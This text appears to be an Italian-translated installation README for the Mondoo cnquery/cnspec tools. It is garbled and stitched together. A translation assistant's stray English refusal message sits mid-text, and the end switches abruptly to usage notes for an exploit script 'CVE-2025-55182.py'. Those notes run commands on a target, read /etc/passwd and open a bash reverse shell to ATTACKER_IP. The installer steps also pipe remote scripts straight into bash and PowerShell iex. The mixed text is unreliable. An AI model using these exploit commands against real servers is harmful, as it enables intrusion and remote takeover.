
installer v13.30.0
Script di installazione per Linux, macOS e Windows per cnquery & cnspec
Panoramica
Stato
Installazione
Il modo più semplice per installare mql e cnspec è utilizzare gli script di installazione.
tramite Shell Script (Linux e macOS)
https://install.mondoo.com/sh```bash
bash -c "$(curl -sSL https://install.mondoo.com/sh)"
### via PowerShell (Windows)
[`https://install.mondoo.com/ps1`](https://install.mondoo.com/ps1)```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo;
Dietro un proxy HTTP
Passa il proxy allo script di installazione con -x (Linux e macOS) o -Proxy
(Windows). Lo script indirizza attraverso di esso i propri download, l'installazione
dei pacchetti, cnspec login e l'aggiornamento automatico. Il download iniziale dello
script avviene prima che il flag venga letto, quindi indirizza anche quello verso il proxy:```bash
export https_proxy='http://proxy.example.com:3128'
curl -sSL --proxy "$https_proxy" https://install.mondoo.com/sh | bash -s -- -x "$https_proxy"
I'm sorry, but I don't see any content to translate in your message. You mentioned "INPUT:" but no actual Markdown text was provided after it.
Please paste the chunk 7 content you'd like me to translate from English to Italian, and I'll return only the translated Markdown, preserving all structure, code, paths, URLs, and technical identifiers exactly as they appear.```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
$wc = New-Object System.Net.WebClient;
$wc.Proxy = New-Object System.Net.WebProxy('http://proxy.example.com:3128');
iex ($wc.DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo -Proxy 'http://proxy.example.com:3128';
Su Linux e macOS un https_proxy o http_proxy ereditato viene rilevato
automaticamente quando -x non è specificato. In entrambi i casi vengono esportate entrambe le forme, quindi
anche i repository della distribuzione — che su Debian e Ubuntu sono in semplice HTTP
— vengono raggiunti attraverso il proxy. Qualsiasi no_proxy tu abbia impostato viene mantenuto
invariato, anche attraverso sudo.
L'URL del proxy deve essere un URL semplice: se contiene credenziali, codificale
in percentuale (! come %21, e così via). Il valore viene scritto nel job pianificato
dell'auto aggiornatore, quindi i caratteri che richiederebbero l'uso di virgolette in quel contesto vengono rifiutati
anziché sottoposti a escape.
Scansiona la tua piattaforma di destinazione
Scansiona la tua piattaforma di destinazione:```bash
query system information with incident and inventory query pack
mql scan aws
scan the platform for security vulnerabilities
cnspec scan aws
Registrati per un account Mondoo per accedere a più policy e archiviare i report. Per saperne di più, [contattaci](https://mondoo.com/contact).```bash
cnspec login -t 'eyJh...llZ4BW'
mql e cnspec supportano target locali e remoti, inclusi server (Linux, Windows, macOS), Cloud (AWS, Azure, Google, VMware), Kubernetes (EKS, GKE, AKS, self-managed), container, registry di container, prodotti SaaS (Google Workspace, M365, GitHub, GitLab) e altro ancora.
Esegui una scansione:```bash
scan your local host
cnspec scan local
scan a cloud environment
cnspec scan aws cnspec scan gcp cnspec scan azure
scan a kubernetes cluster
cnspec scan k8s
scan a docker image from a remote registry
cnspec scan docker image debian:12
scan a docker container (get ids from docker ps)
cnspec scan docker container 00fa961d6b6a
scan a system over ssh
cnspec scan ssh [email protected]
## Informazioni sul pacchetto
`https://install.mondoo.com/package/cnspec/{platform}/{arch}/{filetype}/{version}/{method}`
Gli argomenti supportano i seguenti valori:
| Argomento | Valori |
| ---------- | ---------------------------------------------------- |
| `platform` | `linux`, `windows`, `darwin` |
| `arch` | `amd64`, `arm64`, `armv7`, `armv6`, `386`, `ppc64le` |
| `filetype` | `tar.gz`, `deb`, `rpm`, `zip`, `pkg`, `msi` |
| `version` | `latest` o un numero specifico |
| `method` | `download`, `filename`, `version`, `sha256` |```bash
# Download the latest version
https://install.mondoo.com/package/cnspec/linux/arm64/rpm/latest/download
Utilizzo
python3 CVE-2025-55182.py -u <url> -c <command>
Esempi
# Esegui il comando id
python3 CVE-2025-55182.py -u http://target.com -c "id"
# Leggi un file
python3 CVE-2025-55182.py -u http://target.com -c "cat /etc/passwd"
# Reverse shell
python3 CVE-2025-55182.py -u http://target.com -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"
Rilevamento
Per verificare se un server è vulnerabile senza eseguire comandi:
python3 CVE-2025-55182.py -u http://target.com --check
Mitigazione
- Aggiorna React: passa a React 19.2.1 o versione successiva
- Aggiorna Next.js: passa a Next.js 15.0.5 o versione successiva
- WAF: distribuisci regole WAF per bloccare payload sospetti
- Monitoraggio: monitora i log del server per attività sospette
Riferimenti
Licenza
Questo progetto è fornito solo a scopo didattico e di ricerca sulla sicurezza. Gli autori non sono responsabili per qualsiasi uso improprio.